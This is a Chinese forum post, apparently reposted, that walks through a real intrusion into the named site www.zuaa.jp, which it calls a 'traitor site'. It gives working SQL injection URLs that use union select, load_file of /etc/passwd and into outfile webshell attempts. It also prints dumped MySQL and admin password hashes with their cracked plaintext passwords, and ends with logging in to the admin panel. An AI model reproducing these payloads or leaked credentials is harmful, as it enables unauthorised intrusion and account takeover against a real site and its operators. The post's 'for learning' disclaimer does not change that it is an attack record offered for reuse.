原创 检测汉奸站全过程

xiancda

补：www.zuaa.jp测试

' n0 z7 h+ l( J; b: N
' O+ Y  {/ o0 F) F0x01. 检测 www.zuaa.jp 收集数据

/ b% }$ Q: L; v
; t1 d! m; G1 G4 W7 f+ y% Rwhatweb

' E/ B& x: i# w( M" Q
利用NMAP扫描

中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
0x02.找注入点
& W: D7 q5 R% K! H5 s, E找注入点：http://www.zuaa.jp/php/newsdetail.php?topic_id=390

6 U7 |. z9 n$ O8 O0 B/ k4 t
" `: F: d; E7 v0x03.order by
$ l' z4 k# @* C* f* N' N# V             http://www.zuaa.jp/php/newsdetail.php?topic_id=390 order by 1

, ~+ N# d) d- E) b& g6 Lorder by 28报错，order by 27正常

2 E* O/ w) W! M3 ]0x04.   union手动查询
0 o4 N1 `. ~# u% Bhttp://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
8 e. C. V3 l8 s$ `添加到 27 时正常显示
6 R9 k* a. b  j: Z) a# ^
+ ^9 E6 x4 B2 ]中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
) i2 M; G6 i8 H/ V, U0 `7 `' N
2 O9 _' E$ t9 R: @0x05. info:
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,group_concat(user(),0x3a,database(),0x3a,version(),0x3a,@@version_conpile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
( u0 _# H. q3 ?9 F2 w. t  l7 b
user:            root@localhost
database:    openpne
version:      4.1.22
os:             portbld-freebsd5.4
' d4 w* K' p. s! }# \2 j) f
5 R7 c( k1 d8 y% x0x06. root用户
利用 load_file(0x...), 读文件 (/etc/passwd), 也可以这样 hex(load_file(0x.....)), 然后把得到的 hex ,再转换成字符的（这种方法， 可以过大多数站）
4 v# W" H# e' p& O: P5 phttp://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,hex(load_file(0x2f6574632f706173737764)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
3 K) `2 U* B& s" r4 s# J
通过工具转换
* y, R$ z$ a! h
中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
7 h5 \. d/ a3 P% [
9 _% D  `: W9 l+ q0x07. 利用 into outfile
4 |+ W& G4 @" p; S& w8 s全部都失败
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/zuaa_tech/WEBSITE/htdocs/php/help.php
  B/ C1 @6 G: W' N2 h& y; p* C2 T
0 ?. @' o" D' O9 A( Mhttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/qian/OpenPNE/lib/help.php
& n9 [4 C2 m! _* I) s: n9 n& q% T
7 v9 |# {# Y: G% P7 J页面显示“MDB2 Error:syntax error”
3 E0 a- M9 g& w7 r% T' z
0x08. 利用 mysql 4.1
; G9 O( M4 S$ L3 O7 g猜常规表名，字段未果 工具 sqlmap
7 w6 O# Z$ s1 E& ]2 t: C中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
+ V* l$ U) V# f  W$ K
: S) F* \- @+ H; W6 D

% t5 F0 s/ s5 J. i. R0x09. 查找后台
利用 现有的各种 后台工具尝试都不行

0x10.  MySL外联方法
$ N5 V! D+ H$ O8 [/ I& v3 N- i& U从前面 nmap 收集的信息当中，可以看到开了 mysql 3306 端口 ,尝试得 mysql 用户各密码，然后再通过 mysql 工具外连 www.zuaa.jp 不行
" Y( O8 K/ Q$ t- D可以利用 mysql ( 4.x 5.) 自带的定义表 mysql.user
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.user

这个可以在 www.cmd5.com 解密
root:*3711D518F2924AEFA6F4C6B4B7425CAE8BEB88AB zuaa2009
  J  u5 L, W! I# K6 W& |. mchen:*2A09A939E6B654877DD70B00EA631D1007E58CC9 silkroad97
openpne:*5D80C62EC4D258534F 07D08CCE9CE27DFF26A366 ???
zuaa:*5D80C62EC4D258534F07D08CCE9CE27DFF26A366 ???
工具外连失败，据说防火墙策略只允许特定IP外连，具体不得知

8 R+ u! x5 c' @% x) }) W5 S
0x11. 网站突破
  r" }& `. [9 j7 U' A$ L, H发现网站的源程序 openpne, google 下载 openpne 源码
% l/ B7 p4 ~7 M$ R! w4 t* S+ ^+ D
! _4 f2 a! d9 z! q$ |9 k
0x12. 默认信息利用
* ~/ I% G' z. _% `http://sns.zuaa.jp/?m=admin&a=page_login
1 |& o5 g# ?* P! l# u0 c4 R5 u
表名 (c_admin_user) ，字段名（username,password）
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+c_admin_user
1 {( w4 S; \. [
) t0 o) I9 u6 O解密
zuaa_tech:dd041e2 b1b8ecee164a6cb196a496eda,               zuaa2009
5 v, {6 R+ f6 L4 y0 h# |; Zzuaajp:c0923ec5857796a393da99905008c176,          zju1897

中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持

0x13. 登录后台
) ^# u! O/ h6 w

# d2 g7 e6 E4 z+ }
0x14. 小结
7 b0 L/ _3 R# C# u( l# C* j- o5 U利用网站相关信息，进行突破 利用网站相关信息，进行突破 利用网站相关信息，进行突破 利用网站相关信息，进行突破 。
# K; X. L; X# P$ N, E感谢群 ---- 渗透 -酷帅王子 提供注入点 提供注入点
5 [' k/ Y0 L5 m6 {3 X. ^------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- -------------------------------------------------------By DarkRain
中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
6 m4 i# B4 t- w. y" {
最后声明：本人只负责了整理上传到论坛，让大家学习，不是原作者，原作者辛苦了！
9 \3 h# a4 R& f) n# m

荒村狂客

哪个牛人 费的这劲 入侵的